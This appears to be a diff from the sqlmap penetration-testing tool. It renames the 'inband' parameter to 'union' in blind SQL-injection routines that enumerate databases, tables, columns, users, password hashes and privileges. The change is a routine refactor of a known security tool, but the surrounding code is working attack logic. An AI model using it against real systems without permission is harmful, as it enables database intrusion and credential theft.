value = NULL if column in emptyColumns else inject.getValue(query, inband=False, error=False, dump=True) value = NULL if column in emptyColumns else inject.getValue(query, union=False, error=False, dump=True)
value = '' if value is None else value value = '' if value is None else value
_ = DUMP_REPLACEMENTS.get(getUnicode(value), getUnicode(value)) _ = DUMP_REPLACEMENTS.get(getUnicode(value), getUnicode(value))

20
plugins/generic/search.py
View File

@ -103,7 +103,7 @@ class Search:
query += dbQuery query += dbQuery
query += exclDbsQuery query += exclDbsQuery
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if not isNumPosStrValue(count): if not isNumPosStrValue(count):
warnMsg = "no database" warnMsg = "no database"
@ -127,7 +127,7 @@ class Search:
query += ") AS foobar" query += ") AS foobar"
query = agent.limitQuery(index, query, dbCond) query = agent.limitQuery(index, query, dbCond)
value = inject.getValue(query, inband=False, error=False) value = inject.getValue(query, union=False, error=False)
value = safeSQLIdentificatorNaming(value) value = safeSQLIdentificatorNaming(value)
foundDbs.append(value) foundDbs.append(value)
@ -213,7 +213,7 @@ class Search:
query = rootQuery.blind.count query = rootQuery.blind.count
query += tblQuery query += tblQuery
query += whereDbsQuery query += whereDbsQuery
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if not isNumPosStrValue(count): if not isNumPosStrValue(count):
warnMsg = "no databases have table" warnMsg = "no databases have table"
@ -234,7 +234,7 @@ class Search:
query += ") AS foobar" query += ") AS foobar"
query = agent.limitQuery(index, query) query = agent.limitQuery(index, query)
foundDb = inject.getValue(query, inband=False, error=False) foundDb = inject.getValue(query, union=False, error=False)
foundDb = safeSQLIdentificatorNaming(foundDb) foundDb = safeSQLIdentificatorNaming(foundDb)
if foundDb not in foundTbls: if foundDb not in foundTbls:
@ -258,7 +258,7 @@ class Search:
query = rootQuery.blind.count2 query = rootQuery.blind.count2
query = query % unsafeSQLIdentificatorNaming(db) query = query % unsafeSQLIdentificatorNaming(db)
query += " AND %s" % tblQuery query += " AND %s" % tblQuery
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if not isNumPosStrValue(count): if not isNumPosStrValue(count):
warnMsg = "no table" warnMsg = "no table"
@ -278,7 +278,7 @@ class Search:
query += " AND %s" % tblQuery query += " AND %s" % tblQuery
query = agent.limitQuery(index, query) query = agent.limitQuery(index, query)
foundTbl = inject.getValue(query, inband=False, error=False) foundTbl = inject.getValue(query, union=False, error=False)
kb.hintValue = foundTbl kb.hintValue = foundTbl
foundTbl = safeSQLIdentificatorNaming(foundTbl, True) foundTbl = safeSQLIdentificatorNaming(foundTbl, True)
foundTbls[db].append(foundTbl) foundTbls[db].append(foundTbl)
@ -431,7 +431,7 @@ class Search:
query += colQuery query += colQuery
query += whereDbsQuery query += whereDbsQuery
query += whereTblsQuery query += whereTblsQuery
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if not isNumPosStrValue(count): if not isNumPosStrValue(count):
warnMsg = "no databases have tables containing column" warnMsg = "no databases have tables containing column"
@ -452,7 +452,7 @@ class Search:
if Backend.isDbms(DBMS.DB2): if Backend.isDbms(DBMS.DB2):
query += ") AS foobar" query += ") AS foobar"
query = agent.limitQuery(index, query) query = agent.limitQuery(index, query)
db = inject.getValue(query, inband=False, error=False) db = inject.getValue(query, union=False, error=False)
db = safeSQLIdentificatorNaming(db) db = safeSQLIdentificatorNaming(db)
if db not in dbs: if db not in dbs:
@ -487,7 +487,7 @@ class Search:
query = query % db query = query % db
query += " AND %s" % colQuery query += " AND %s" % colQuery
query += whereTblsQuery query += whereTblsQuery
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if not isNumPosStrValue(count): if not isNumPosStrValue(count):
warnMsg = "no tables contain column" warnMsg = "no tables contain column"
@ -507,7 +507,7 @@ class Search:
query += " AND %s" % colQuery query += " AND %s" % colQuery
query += whereTblsQuery query += whereTblsQuery
query = agent.limitQuery(index, query) query = agent.limitQuery(index, query)
tbl = inject.getValue(query, inband=False, error=False) tbl = inject.getValue(query, union=False, error=False)
kb.hintValue = tbl kb.hintValue = tbl
tbl = safeSQLIdentificatorNaming(tbl, True) tbl = safeSQLIdentificatorNaming(tbl, True)

12
plugins/generic/users.py
View File

@ -111,7 +111,7 @@ class Users:
else: else:
query = rootQuery.blind.count query = rootQuery.blind.count
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if not isNumPosStrValue(count): if not isNumPosStrValue(count):
errMsg = "unable to retrieve the number of database users" errMsg = "unable to retrieve the number of database users"
@ -127,7 +127,7 @@ class Users:
query = rootQuery.blind.query2 % index query = rootQuery.blind.query2 % index
else: else:
query = rootQuery.blind.query % index query = rootQuery.blind.query % index
user = inject.getValue(query, inband=False, error=False) user = inject.getValue(query, union=False, error=False)
if user: if user:
kb.data.cachedUsers.append(user) kb.data.cachedUsers.append(user)
@ -252,7 +252,7 @@ class Users:
else: else:
query = rootQuery.blind.count % user query = rootQuery.blind.count % user
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if not isNumPosStrValue(count): if not isNumPosStrValue(count):
warnMsg = "unable to retrieve the number of password " warnMsg = "unable to retrieve the number of password "
@ -277,7 +277,7 @@ class Users:
else: else:
query = rootQuery.blind.query % (user, index) query = rootQuery.blind.query % (user, index)
password = inject.getValue(query, inband=False, error=False) password = inject.getValue(query, union=False, error=False)
password = parsePasswordHash(password) password = parsePasswordHash(password)
passwords.append(password) passwords.append(password)
@ -467,7 +467,7 @@ class Users:
else: else:
query = rootQuery.blind.count % user query = rootQuery.blind.count % user
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if not isNumPosStrValue(count): if not isNumPosStrValue(count):
if Backend.isDbms(DBMS.ORACLE) and not query2: if Backend.isDbms(DBMS.ORACLE) and not query2:
@ -500,7 +500,7 @@ class Users:
query = rootQuery.blind.query % (index, user) query = rootQuery.blind.query % (index, user)
else: else:
query = rootQuery.blind.query % (user, index) query = rootQuery.blind.query % (user, index)
privilege = inject.getValue(query, inband=False, error=False) privilege = inject.getValue(query, union=False, error=False)
# In PostgreSQL we get 1 if the privilege is True, # In PostgreSQL we get 1 if the privilege is True,
# 0 otherwise # 0 otherwise